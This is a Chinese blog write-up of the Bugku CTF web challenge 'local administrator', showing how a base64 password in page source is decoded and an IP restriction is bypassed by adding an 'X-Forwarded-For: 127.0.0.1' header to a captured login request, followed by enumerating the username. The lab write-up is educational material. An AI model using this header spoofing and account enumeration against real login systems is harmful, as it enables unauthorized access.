bugku-web-本地管理员

最新推荐文章于 2024-11-05 15:31:54 发布
最新推荐文章于 2024-11-05 15:31:54 发布
阅读量322 收藏
点赞数 5
分类专栏: CTF靶场 文章标签: 前端 安全 web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75121443/article/details/137160289
版权
文章讲述了在网页源码中发现的base加密数据,通过IP访问限制的分析,作者尝试修改IP并伪造请求头,最终推测出test123可能是admin账号,成功登录。
摘要由CSDN通过智能技术生成

在页面源码的最右段发现一个base加密数据

dGVzdDEyMw==
解密后
test123
将test作为账号123为密码尝试

说这个ip被禁止访问
那么问题应该出现在ip上
这里将请求报文抓取下来

POST / HTTP/1.1
Host: 114.67.175.224:18838
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:18838
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://114.67.175.224:18838/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_c1b044f909411ac4213045f0478e96fc=1711286763; _ga=GA1.1.52075818.1711286767; _gid=GA1.1.1919961319.1711286767; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1711290145; _ga_F3VRZT58SJ=GS1.1.1711288951.2.1.1711290145.0.0.0
Connection: close

user=test&pass=123

这里我们想办法让发送过去的ip改一改
让报文伪造从本地发送的情况
添加字段

X-Forwarded-For:127.0.0.1

现在的报文

POST / HTTP/1.1
Host: 114.67.175.224:18838
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:18838
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://114.67.175.224:18838/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_c1b044f909411ac4213045f0478e96fc=1711286763; _ga=GA1.1.52075818.1711286767; _gid=GA1.1.1919961319.1711286767; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1711290145; _ga_F3VRZT58SJ=GS1.1.1711288951.2.1.1711290145.0.0.0
Connection: close
X-Forwarded-For:127.0.0.1

user=test&pass=123

发送

出现效果,就是密码不对
猜测test123应该是一个整体,应该是密码
账号进行遍历,得到是admin

登录成功

白牧羊人
关注
专栏目录
bugku-web12-本地管理员
weixin_50774579的博客
05-24 1492
1.查看源代码发现了线索,base64解码得到字符串‘test123' 2.管理员默认账号admin,密码test123,登录,提示IP禁止访问,请联系本地管理员登陆,IP已被记录. burp拦截,发到repeater, 添加http头X-Forwarded-For: 127.0.0.1,即可 也可以用hackbar直接在浏览器上完成,这个比较简单。 要注意!X-Forwarded-For: 127.0.0.1(IP前面要有一个空格) base64解码+XFF伪造请求头 知识点:以...
Bugku--CTF-- 1、本地管理员 2、网站被黑
记录笔记
07-07 1346
Bugku--CTF--1、本地管理员 2、网站被黑
Bugku-web-本地管理员
qq_68457525的博客
06-26 435
ctf练习之修改文件头实现本地登录
BUGKU-WEB 本地管理员
天泽岁月
02-16 579
BUGKU-WEB 本地管理员,绕开限制
Bugku---本地管理员
2201_75556700的博客
03-07 1018
【代码】Bugku---本地管理员
Bugku---web---本地管理员
weixin_47450099的博客
04-30 203
Bugku---web---本地管理员 网络安全
BUGKU--web详解
qq_49422880的博客
05-28 2051
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
bugku-本地管理员
2202_75317918的博客
03-02 431
bugku 本地管理员
【愚公系列】2023年06月 Bugku-Web(本地管理员
时光隧道
06-26 5845
是一个HTTP请求头,用于标识客户端(例如浏览器)的IP地址。在某些环境下,因为客户端通过了多个代理服务器来访问服务器,所以服务器不能直接获得客户端的真实IP地址,而只能获取到代理服务器的IP地址。此时,代理服务器会在HTTP请求头中添加一个字段,将客户端的真实IP地址添加到这个字段中。这样,服务器就可以通过解析字段中的IP地址,知道客户端的真实IP地址。例如,如果客户端使用IP1地址访问了一个代理服务器,代理服务器再使用IP2地址访问另一个代理服务器,最终访问了服务器,则HTTP 请求头中的。
bugku-writeup-web-本地管理员
dark的博客
06-14 241
bugku-web12解题思路记录。” ​ 01 — 解码 按F12查看源码,发现登陆密码。 使用base64在线工具解码,得到密码为test123。 02 — 本地登陆 输入用户名:admin,密码:test123,提示无法登陆,并显示“IP禁止访问,请联系本地管理员登陆,IP已被记录”。可以推断需要本地登陆,因此,打开Burp suite抓包,在Proxy查看HTTP history。 发送到Repeater,添...
BugkuCTF-WEB题本地管理员
am_03的博客
08-25 1878
基础知识: base64: 是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一类基于64个可打印字符来表示二进制数据的方法。 XFF伪造请求头: X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原本的IP地址的HTTP请求头字段。 简单来说,XXF是告诉服务器当前请求者的最后ip的http请求头字段,通常可以直接通过修改http头里的X-Forwarded-For字段来仿造请求的最后ip。 打开场景: 为一个登录界面 尝试输
BUGKU-WEB
wojiushilsy的博客
02-22 556
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
Bugku-WEB-writeup(持续学习中~)
devil_sad的博客
11-12 3376
滑稽 打开题目发现一堆笑脸怼脸 按F12直接查看网页源代码即可获得flag 计算器 打开之后发现需要计算并输入验证码,可只能输入一位数字 我们可以右键单击输入框审查元素把maxlength改成3,使得我们能在验证框输入三位数 输入验证码即可得到flag 或者我们也可以直接点击上文中红框中的"js/code.js"也可以直接查看flag POST 通过阅读代码得知$what=='flag'即可得到flag 可是我们直接在URL后输入无法得到flag,于是...
Webserver(3.3)生产者消费者模型
最新发布
学习历程记录和分享
11-05 182
解决该问题需要用互斥量确保线程同步,用条件变量或者信号量去解决生产者和消费者之间同步的问题,生产者把数据生产满了要通知消费者去消费。会产生数据安全问题,比如生产者还未生产出来,就去消费。
做一个能适配「手机」的网站需要注意什么
illidri的博客
11-01 301
像现在主流会采用 H5 响应式布局,仅涉及前端的开发工作,代码量少,效果佳,是一种性价比比较高的选择,如果题主有意要进行网站建站,特别是想要手机浏览也有一定效果,可以选择这种~当然还有一种类似的方式叫自适应布局,俗称 AWD(AdaptiveWebDesign),同样是检测视口分辨率,判断不同尺寸和分辨率是什么设备,从而返回不同布局页面。最根本的区别在于,响应式页面的代码量少,但质量要求高,根据不同分辨率自动调整排版,而自适应页面需要根据不同设备准备不同的页面,这样前期的开发工作就大了很多。
vxe-grid ,增加新行,并且定位到新增的行
花花鱼的专栏
11-05 97
vxe-grid新增空行,并且定位到空行位置。
Web前端第二次作业
nixiaoge的博客
11-05 114
作业要求:制作带有下拉悬停菜单的导航栏。
前端 常见开发工具使用
weixin_45534301的博客
10-31 496
【代码】前端 常见开发工具使用。
Webserver(2.8)守护进程
学习历程记录和分享
11-04 201
每隔2s获取系统时间,将这个时间写入到磁盘文件中。
bugku chatgpt-1
10-09
ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构,通过预训练大量文本数据来学习如何生成人类可读的文本,然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛,可以用于自然...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值